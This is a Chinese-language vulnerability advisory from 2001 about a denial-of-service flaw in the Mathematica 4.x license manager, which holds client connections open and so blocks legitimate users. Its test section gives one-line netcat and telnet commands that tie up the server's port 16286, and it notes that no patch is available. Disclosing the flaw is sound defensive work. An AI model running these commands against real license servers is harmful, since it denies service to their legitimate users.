发布日期：2001-07-30
更新日期：2001-08-02

受影响系统：

Wolfram Research Mathematica 4.1
Wolfram Research Mathematica 4.0

描述：

---

BUGTRAQ  ID: 3120
CVE(CAN) ID: CAN-2001-1057

Mathematica是一个由Wolfram Research发布和维护的数学计算软件包。

Mathematica许可证管理器无法正确处理连接请求。在接收到来自客户端的请求时，服务器没
有将已建立的连接分配到单独的端口进行服务。另外，即使服务器无法解释客户端提交的
请求，也不会中断连接。

因此，远程用户有可能使合法用户无法使用该服务。


<*来源：Pinwheel (pinwheel@shout.net)  *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

cat /dev/null | nc licenseserver.example.com 16286

或者：

telnet licenseserver.example.com 16286




建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.wolfram.com/



浏览次数：3642
严重程度：0（网友投票）